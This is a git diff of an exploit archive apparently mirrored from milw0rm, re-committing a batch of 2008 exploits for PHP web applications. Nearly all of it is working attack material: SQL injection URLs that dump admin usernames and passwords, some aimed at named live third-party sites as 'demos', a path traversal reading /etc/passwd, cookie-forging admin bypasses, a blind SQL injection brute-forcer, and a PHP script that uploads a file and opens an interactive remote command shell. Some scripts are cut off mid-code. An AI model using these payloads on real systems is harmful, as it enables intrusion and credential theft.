+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6518.txt b/platforms/php/webapps/6518.txt
index 202414004..3de718919 100755
--- a/platforms/php/webapps/6518.txt
+++ b/platforms/php/webapps/6518.txt
@@ -1,30 +1,30 @@
-######## ## ## ###### ######## ## ## ######## ######## ####### ########
-## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##
-## #### ## ## ## ## #### ## ## ## ## ## ##
-###### ## ## ## ## ######## ## ######## ## ####### ## ##
-## ## #### ## ## ## ## ## ## ## ## ##
-## ## ### ## ## ## ## ## ## ## ## ## ## ##
-######## ## ## ###### ## ## ## ## ## ####### ########
-################################ !R4Q!4N H4CK3R ###################################
-NetArtMedia Real Estate Portal v2.0 Sql Injection Vulnerability
-Website : http://www.netartmedia.net
-Founded By : Encrypt3d.M!nd
-Home Page : http://encrypt3d.blogspot.com
-
-# Remote Sql Injection(s) :
-Affected File :
-index.php
-
-PoC:
-/index.php?mod=re_search&ad=-666 union select 1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users
-
-Administration Panel:
-/ADMIN/login.php
-
-# Greetz:
-MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
-KoRn The Dog,MiNi-SpIder,All My Friends
-
-The EnD :D
-
-# milw0rm.com [2008-09-21]
+######## ## ## ###### ######## ## ## ######## ######## ####### ########
+## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##
+## #### ## ## ## ## #### ## ## ## ## ## ##
+###### ## ## ## ## ######## ## ######## ## ####### ## ##
+## ## #### ## ## ## ## ## ## ## ## ##
+## ## ### ## ## ## ## ## ## ## ## ## ## ##
+######## ## ## ###### ## ## ## ## ## ####### ########
+################################ !R4Q!4N H4CK3R ###################################
+NetArtMedia Real Estate Portal v2.0 Sql Injection Vulnerability
+Website : http://www.netartmedia.net
+Founded By : Encrypt3d.M!nd
+Home Page : http://encrypt3d.blogspot.com
+
+# Remote Sql Injection(s) :
+Affected File :
+index.php
+
+PoC:
+/index.php?mod=re_search&ad=-666 union select 1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users
+
+Administration Panel:
+/ADMIN/login.php
+
+# Greetz:
+MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
+KoRn The Dog,MiNi-SpIder,All My Friends
+
+The EnD :D
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6519.php b/platforms/php/webapps/6519.php
index e34f46b8e..84df07e7e 100755
--- a/platforms/php/webapps/6519.php
+++ b/platforms/php/webapps/6519.php
@@ -1,127 +1,127 @@
-'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_action_success'].'
    '; - 84. } else { - 85. $addupdate_msg = $addupdate_msg . ''.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_upload_error'].'
    '; - 86. } - 87. } - 88. } - - restricted access to this script isn't properly realized, so an attacker might be able to upload a calendar file - (with .ics extension) into /calendars directory...multiple file extensions isn't checked, but 'ics' is generally - recognized as text/calendar MIME type by most servers...so this poc try to include the uploaded file using the - same LFI bug found by rgod (http://retrogod.altervista.org/phpical_221_incl_xpl.html), that isn't still patched! -*/ - -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); - -define(STDIN, fopen("php://stdin", "r")); - -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} - -print "\n+---------------------------------------------------------------------------+"; -print "\n| PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit by EgiX |"; -print "\n+---------------------------------------------------------------------------+\n"; - -if ($argc < 3) -{ - print "\nUsage......: php $argv[0] host path\n"; - print "\nExample....: php $argv[0] localhost /"; - print "\nExample....: php $argv[0] localhost /phpicalendar/\n"; - die(); -} - -$host = $argv[1]; -$path = $argv[2]; - -$payload = "--o0oOo0o\r\n"; -$payload .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n"; -$payload .= "addupdate\r\n"; -$payload .= "--o0oOo0o\r\n"; -$payload .= "Content-Disposition: form-data; name=\"calfile[1]\"; filename=\"fake_cal.ics\"\r\n\r\n"; -$payload .= "BEGIN:VCALENDAR\n\r\n"; -$payload .= "--o0oOo0o--\r\n"; - -$packet = "POST {$path}admin/index.php HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Content-Length: ".strlen($payload)."\r\n"; -$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; 
-$packet .= "Connection: close\r\n\r\n"; -$packet .= $payload; - -http_send($host, $packet); - -$packet = "GET {$path}preferences.php?action=setcookie HTTP/1.0\r\n"; -$packet .= "Host: {$host}\r\n"; -$packet .= "Connection: close\r\n\r\n"; - -preg_match("/Set-Cookie: (phpicalendar_[^=]*)=/", http_send($host, $packet), $cookie); - -$data = urlencode(serialize(array("cookie_language" => "../calendars/fake_cal.ics".chr(0)))); - -while(1) -{ - print "\nphpicalendar-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}print.php HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Cookie: {$cookie[1]}={$data}\r\n"; - $packet .= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet .= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - $shell = explode("_code_", $output); - preg_match("/_code_/", $output) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n"); - } - else break; -} - -?> - -# milw0rm.com [2008-09-21] +'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_action_success'].'
    '; + 84. } else { + 85. $addupdate_msg = $addupdate_msg . ''.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_upload_error'].'
    '; + 86. } + 87. } + 88. } + + restricted access to this script isn't properly realized, so an attacker might be able to upload a calendar file + (with .ics extension) into /calendars directory...multiple file extensions isn't checked, but 'ics' is generally + recognized as text/calendar MIME type by most servers...so this poc try to include the uploaded file using the + same LFI bug found by rgod (http://retrogod.altervista.org/phpical_221_incl_xpl.html), that isn't still patched! +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); + +define(STDIN, fopen("php://stdin", "r")); + +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock = fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} + +print "\n+---------------------------------------------------------------------------+"; +print "\n| PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit by EgiX |"; +print "\n+---------------------------------------------------------------------------+\n"; + +if ($argc < 3) +{ + print "\nUsage......: php $argv[0] host path\n"; + print "\nExample....: php $argv[0] localhost /"; + print "\nExample....: php $argv[0] localhost /phpicalendar/\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +$payload = "--o0oOo0o\r\n"; +$payload .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n"; +$payload .= "addupdate\r\n"; +$payload .= "--o0oOo0o\r\n"; +$payload .= "Content-Disposition: form-data; name=\"calfile[1]\"; filename=\"fake_cal.ics\"\r\n\r\n"; +$payload .= "BEGIN:VCALENDAR\n\r\n"; +$payload .= "--o0oOo0o--\r\n"; + +$packet = "POST {$path}admin/index.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($payload)."\r\n"; +$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; 
+$packet .= "Connection: close\r\n\r\n"; +$packet .= $payload; + +http_send($host, $packet); + +$packet = "GET {$path}preferences.php?action=setcookie HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Connection: close\r\n\r\n"; + +preg_match("/Set-Cookie: (phpicalendar_[^=]*)=/", http_send($host, $packet), $cookie); + +$data = urlencode(serialize(array("cookie_language" => "../calendars/fake_cal.ics".chr(0)))); + +while(1) +{ + print "\nphpicalendar-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}print.php HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Cookie: {$cookie[1]}={$data}\r\n"; + $packet .= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + $shell = explode("_code_", $output); + preg_match("/_code_/", $output) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n"); + } + else break; +} + +?> + +# milw0rm.com [2008-09-21] diff --git a/platforms/php/webapps/6520.txt b/platforms/php/webapps/6520.txt index f26341e88..31cbeef2a 100755 --- a/platforms/php/webapps/6520.txt +++ b/platforms/php/webapps/6520.txt 
@@ -1,20 +1,20 @@
-|___________________________________________________|
-|
-| 6rbScript V3.3 Local file Vulnerability
-|
-|___________________________________________________
-| |
-|
-| script : www.6rbscript.com
-|
-| DorK : inurl:"section.php?name=singers"
-| dorK : Powered By 6rbScript V3.3
-|___________________________________________________|
-
-Author : Stack
-
-Expl need magic quote = off & open basdir = off in many server
-
-site.il/section.php?name=../../../../etc/passwd
-
-# milw0rm.com [2008-09-21]
+|___________________________________________________|
+|
+| 6rbScript V3.3 Local file Vulnerability
+|
+|___________________________________________________
+| |
+|
+| script : www.6rbscript.com
+|
+| DorK : inurl:"section.php?name=singers"
+| dorK : Powered By 6rbScript V3.3
+|___________________________________________________|
+
+Author : Stack
+
+Expl need magic quote = off & open basdir = off in many server
+
+site.il/section.php?name=../../../../etc/passwd
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6521.txt b/platforms/php/webapps/6521.txt
index ddd3d804a..2d21bbdff 100755
--- a/platforms/php/webapps/6521.txt
+++ b/platforms/php/webapps/6521.txt
@@ -1,10 +1,10 @@
-###############################################################################################
-[+] Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack
-[+] Greetz : All my freind
-################################################################################################
----
-exploit:
-javascript:document.cookie = "usuario=1; path=/"; document.cookie = "pass=1; path=/";
-
-# milw0rm.com [2008-09-21]
+###############################################################################################
+[+] Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack
+[+] Greetz : All my freind
+################################################################################################
+---
+exploit:
+javascript:document.cookie = "usuario=1; path=/"; document.cookie = "pass=1; path=/";
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6522.txt b/platforms/php/webapps/6522.txt
index 7417d9565..843309e03 100755
--- a/platforms/php/webapps/6522.txt
+++ b/platforms/php/webapps/6522.txt
@@ -1,61 +1,61 @@ -|___________________________________________________| -| -| Article Script (view.php v ) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -| -|___________________________________________________ -| | -| -| script : http://www.availscript.com/article_script.php -| -| DorK : :) -|___________________________________________________| - - - -Exploit: -________ - - - -www.[target].com/Script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo-- - - - -L!VE DEMO: - - -http://www.availscript.com/article_script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo-- - - - -Login : - -www.[target].com/Script/admin/login.php - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone -|______________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-09-21] +|___________________________________________________| +| +| Article Script (view.php v ) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +| +|___________________________________________________ +| | +| +| script : http://www.availscript.com/article_script.php +| +| DorK : :) +|___________________________________________________| + + + +Exploit: +________ + + + +www.[target].com/Script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo-- + + + 
+L!VE DEMO: + + +http://www.availscript.com/article_script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo-- + + + +Login : + +www.[target].com/Script/admin/login.php + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone +|______________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-09-21] diff --git a/platforms/php/webapps/6524.txt b/platforms/php/webapps/6524.txt index 49c05f477..a445cb54b 100755 --- a/platforms/php/webapps/6524.txt +++ b/platforms/php/webapps/6524.txt 
@@ -1,34 +1,34 @@ -[~] WSN Links 2.23 AND 2.22 (vote.php) - SQL Injection Vulnerability -[~] -[~] http://scripts.webmastersite.net/wsnlinks/ -[~] ---------------------------------------------------------- -[~] Bug founded by d3v1l -[~] -[~] Date: 21.09.2008 -[~] -[~] -[~] d3v1l@spoofer.com -[~] -[~] ----------------------------------------------------------- -[~] Greetz tO:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] Pentest|Gibon|Pig -[~]------------------------------------------------------------- -[~] Exploit :- -[~] -[~] http://site.com/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/* -[~] -[~] Demo :- -[~] -[~] 2.22 -[~] -[~] http://www.bujinkantrollhattan.com/scripts/wsnlinks/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/* -[~] -[~] 2.23 -[~] -[~] http://linkit.kalikos.org/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/* -[~]---------------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-09-22] +[~] WSN Links 2.23 AND 2.22 (vote.php) - SQL Injection Vulnerability +[~] +[~] http://scripts.webmastersite.net/wsnlinks/ +[~] ---------------------------------------------------------- +[~] Bug founded by d3v1l +[~] +[~] Date: 21.09.2008 +[~] +[~] +[~] d3v1l@spoofer.com +[~] +[~] ----------------------------------------------------------- +[~] Greetz tO:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] Pentest|Gibon|Pig +[~]------------------------------------------------------------- +[~] Exploit :- +[~] +[~] http://site.com/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/* +[~] +[~] Demo :- +[~] +[~] 
2.22 +[~] +[~] http://www.bujinkantrollhattan.com/scripts/wsnlinks/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/* +[~] +[~] 2.23 +[~] +[~] http://linkit.kalikos.org/vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/* +[~]---------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-09-22] diff --git a/platforms/php/webapps/6525.txt b/platforms/php/webapps/6525.txt index a6fe3d23d..db2c0fbf1 100755 --- a/platforms/php/webapps/6525.txt +++ b/platforms/php/webapps/6525.txt 
@@ -1,34 +1,34 @@
-[~] WSN Links 2.20 (comments.php) - SQL Injection Vulnerability
-[~]
-[~] http://scripts.webmastersite.net/wsnlinks/
-[~] ----------------------------------------------------------
-[~] Bug founded by d3v1l
-[~]
-[~] Date: 21.09.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com
-[~]
-[~] -----------------------------------------------------------
-[~] Greetz tO:-
-[~]
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~]
-[~] Pentest|Gibon|Pig
-[~]-------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
-[~]
-[~] http://site.com/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
-[~]
-[~]
-[~] Demo :-
-[~]
-[~] http://www.lara.on.ca/business/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
-[~]
-[~] http://www.lara.on.ca/business/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
-[~]
-[~]----------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-09-22]
+[~] WSN Links 2.20 (comments.php) - SQL Injection Vulnerability
+[~]
+[~] http://scripts.webmastersite.net/wsnlinks/
+[~] ----------------------------------------------------------
+[~] Bug founded by d3v1l
+[~]
+[~] Date: 21.09.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com
+[~]
+[~] -----------------------------------------------------------
+[~] Greetz tO:-
+[~]
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~]
+[~] Pentest|Gibon|Pig
+[~]-------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
+[~]
+[~] http://site.com/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
+[~]
+[~]
+[~] Demo :-
+[~]
+[~] http://www.lara.on.ca/business/comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
+[~]
+[~] http://www.lara.on.ca/business/comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1/*
+[~]
+[~]----------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6526.txt b/platforms/php/webapps/6526.txt
index 7a0ec9a9e..10b2fb2e0 100755
--- a/platforms/php/webapps/6526.txt
+++ b/platforms/php/webapps/6526.txt
@@ -1,11 +1,11 @@
-###############################################################################################
-[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack
-[+] Greetz : All my freind
-################################################################################################
----
-exploit:
-javascript:document.cookie = "phpicalendar_login=1; path=/";
-javascript:document.cookie = "phpicalendar=1; path=/";
-
-# milw0rm.com [2008-09-22]
+###############################################################################################
+[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack
+[+] Greetz : All my freind
+################################################################################################
+---
+exploit:
+javascript:document.cookie = "phpicalendar_login=1; path=/";
+javascript:document.cookie = "phpicalendar=1; path=/";
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6527.txt b/platforms/php/webapps/6527.txt
index 5517835d9..13effc035 100755
--- a/platforms/php/webapps/6527.txt
+++ b/platforms/php/webapps/6527.txt
@@ -1,17 +1,17 @@
-BuzzyWall <= 1.3.1 SQL Injection Vulnerability
-
-Author: ~!Dok_tOR!~
-Date found: 31.08.08
-Product: BuzzyWall
-Version: 1.3.1
-Price: 40$
-URL: www.buzzscripts.com
-Download script: http://nullstore.net/Reaper/4ptp1chdeais/BuzzyWall.v1.3.1.Nulled.rar.html
-Vulnerability Class: SQL Injection
-Condition: magic_quotes_gpc = Off
-
-Exploit:
-
-http://localhost/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*
-
-# milw0rm.com [2008-09-22]
+BuzzyWall <= 1.3.1 SQL Injection Vulnerability
+
+Author: ~!Dok_tOR!~
+Date found: 31.08.08
+Product: BuzzyWall
+Version: 1.3.1
+Price: 40$
+URL: www.buzzscripts.com
+Download script: http://nullstore.net/Reaper/4ptp1chdeais/BuzzyWall.v1.3.1.Nulled.rar.html
+Vulnerability Class: SQL Injection
+Condition: magic_quotes_gpc = Off
+
+Exploit:
+
+http://localhost/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*
+
+# milw0rm.com [2008-09-22]
diff --git a/platforms/php/webapps/6529.php b/platforms/php/webapps/6529.php
index 75bb7f45e..fcad059de 100755
--- a/platforms/php/webapps/6529.php
+++ b/platforms/php/webapps/6529.php
@@ -1,67 +1,67 @@ -[-]Powered by WSN Links Free 4.0.34P Blind SQL Injection - -By Stack - -exploit: -http://site.com/path/comments.php?id=1 and 2>1/* #the page fully loaded -http://site.com/path/comments.php?id=1 and 1>3/* #page loaded whit any data and some error that say - "No such content exists. The link you are following seems to have been incorrect." -cheking the mysql version: -http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=5 -or -http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=4 -# you can exploting the bug white blind sql automatic toolz such as sqlmap or ... -simple exploit to get user() -" ,'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','.','*','%','é','&' ); -echo "\n[+] BF Longeur User : "; -$stop = false ; -while($stop == false){ - $lenregexp = stringtohex('^.{'.$login_len.'}$'); - $xurl = $url."+AND+(SELECT+user())+REGEXP+$lenregexp/**" ; - $rep = file_get_contents($xurl); - if(preg_match("#$regexp#",$rep)){ - echo $login_len ; - $stop = true ; - } - if($stop == false) $login_len++ ; -} -echo "\n[+] BF du User : "; -for($i=0; $i<= $login_len; $i++){ - $ok = false ; - foreach($alphabet_Stack as $Stackl){ - if($ok == true) continue ; - $like = stringtohex($login.$Stackl); - $urlx = $url."+AND+(SELECT+user())+LIKE+concat($like,0x25)/*"; - $rep = file_get_contents($urlx) ; - - if(preg_match("#$regexp#",$rep)){ - echo $Stackl ; - $login .= $Stackl ; - $ok = true ; - } - } -} -echo "\n\n[+] Injection Completed \n"; -echo "\t User : $login\n\t"; -?> - -# milw0rm.com [2008-09-22] +[-]Powered by WSN Links Free 4.0.34P Blind SQL Injection + +By Stack + +exploit: +http://site.com/path/comments.php?id=1 and 2>1/* #the page fully loaded +http://site.com/path/comments.php?id=1 and 1>3/* #page loaded whit any data and some error that say + "No such content exists. The link you are following seems to have been incorrect." 
+cheking the mysql version: +http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=5 +or +http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=4 +# you can exploting the bug white blind sql automatic toolz such as sqlmap or ... +simple exploit to get user() +" ,'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','.','*','%','é','&' ); +echo "\n[+] BF Longeur User : "; +$stop = false ; +while($stop == false){ + $lenregexp = stringtohex('^.{'.$login_len.'}$'); + $xurl = $url."+AND+(SELECT+user())+REGEXP+$lenregexp/**" ; + $rep = file_get_contents($xurl); + if(preg_match("#$regexp#",$rep)){ + echo $login_len ; + $stop = true ; + } + if($stop == false) $login_len++ ; +} +echo "\n[+] BF du User : "; +for($i=0; $i<= $login_len; $i++){ + $ok = false ; + foreach($alphabet_Stack as $Stackl){ + if($ok == true) continue ; + $like = stringtohex($login.$Stackl); + $urlx = $url."+AND+(SELECT+user())+LIKE+concat($like,0x25)/*"; + $rep = file_get_contents($urlx) ; + + if(preg_match("#$regexp#",$rep)){ + echo $Stackl ; + $login .= $Stackl ; + $ok = true ; + } + } +} +echo "\n\n[+] Injection Completed \n"; +echo "\t User : $login\n\t"; +?> + +# milw0rm.com [2008-09-22] diff --git a/platforms/php/webapps/6531.txt b/platforms/php/webapps/6531.txt index e42d38c80..50acd0cfd 100755 --- a/platforms/php/webapps/6531.txt +++ b/platforms/php/webapps/6531.txt 
@@ -1,48 +1,48 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -MyBlog <= 0.9.8: PHP and MySQL Blog/CMS software / Cookie poisioning --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -$ Program: MyBlog -$ File affected: all /admin/*.php files -$ Version: 0.9.8 -$ Download: http://sourceforge.net/projects/myblog/ - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - -MyBlog is an open source Blog/CMS project. It allows begginers to have a -simple to use blog/cms and it will still please developers with feature -packed system with plugins, themes and modules. - - -You can alter cookies to get admin privileges. - - -Code of add.php: - - - -If you try to enter http://blog/admin you obtain: 'Please Login' and the cookie -is some likes that: - -login=Pepelux; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926 - -But if you change the cookie and put, for example: - -admin=yes; login=admin; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926 - -Then you obtain complete access to the admin panel. - -Exploit: -javascript:document.cookie = "admin=yes; login=admin"; - -# milw0rm.com [2008-09-22] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +MyBlog <= 0.9.8: PHP and MySQL Blog/CMS software / Cookie poisioning +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +$ Program: MyBlog +$ File affected: all /admin/*.php files +$ Version: 0.9.8 +$ Download: http://sourceforge.net/projects/myblog/ + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + +MyBlog is an open source Blog/CMS project. It allows begginers to have a +simple to use blog/cms and it will still please developers with feature +packed system with plugins, themes and modules. + + +You can alter cookies to get admin privileges. 
+ + +Code of add.php: + + + +If you try to enter http://blog/admin you obtain: 'Please Login' and the cookie +is some likes that: + +login=Pepelux; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926 + +But if you change the cookie and put, for example: + +admin=yes; login=admin; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926 + +Then you obtain complete access to the admin panel. + +Exploit: +javascript:document.cookie = "admin=yes; login=admin"; + +# milw0rm.com [2008-09-22] diff --git a/platforms/php/webapps/6533.txt b/platforms/php/webapps/6533.txt index d88bd55d8..2251035ef 100755 --- a/platforms/php/webapps/6533.txt +++ b/platforms/php/webapps/6533.txt 
@@ -1,36 +1,35 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ##################################################################### - # [ basebuilder <= 2.0.1 ] Remote File Inclusion Vulnerability # - ##################################################################### - # - # Script site: http://basebuilder.sourceforge.net/ - # Download: http://sourceforge.net/project/showfiles.php?group_id=110199 - # - # Vuln: http://site.com/basebuilder/src/main.inc.php?mj_config[src_path]=[spread???] - # - # - # Bug: ./basebuilder-2.0.1/src/main.inc.php (line: 56) - # - # ... - # include($mj_config['src_path'] . '/classes/class.mj.basebuilder.inc.php'); - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-22] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ##################################################################### + # [ basebuilder <= 2.0.1 ] Remote File Inclusion Vulnerability # + ##################################################################### + # + # Script site: http://basebuilder.sourceforge.net/ + # Download: http://sourceforge.net/project/showfiles.php?group_id=110199 + # + # Vuln: http://site.com/basebuilder/src/main.inc.php?mj_config[src_path]=[spread???] + # + # + # Bug: ./basebuilder-2.0.1/src/main.inc.php (line: 56) + # + # ... + # include($mj_config['src_path'] . '/classes/class.mj.basebuilder.inc.php'); + # ... 
+ # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-22] diff --git a/platforms/php/webapps/6535.txt b/platforms/php/webapps/6535.txt index 7db323198..0ef3c0c4f 100755 --- a/platforms/php/webapps/6535.txt +++ b/platforms/php/webapps/6535.txt 
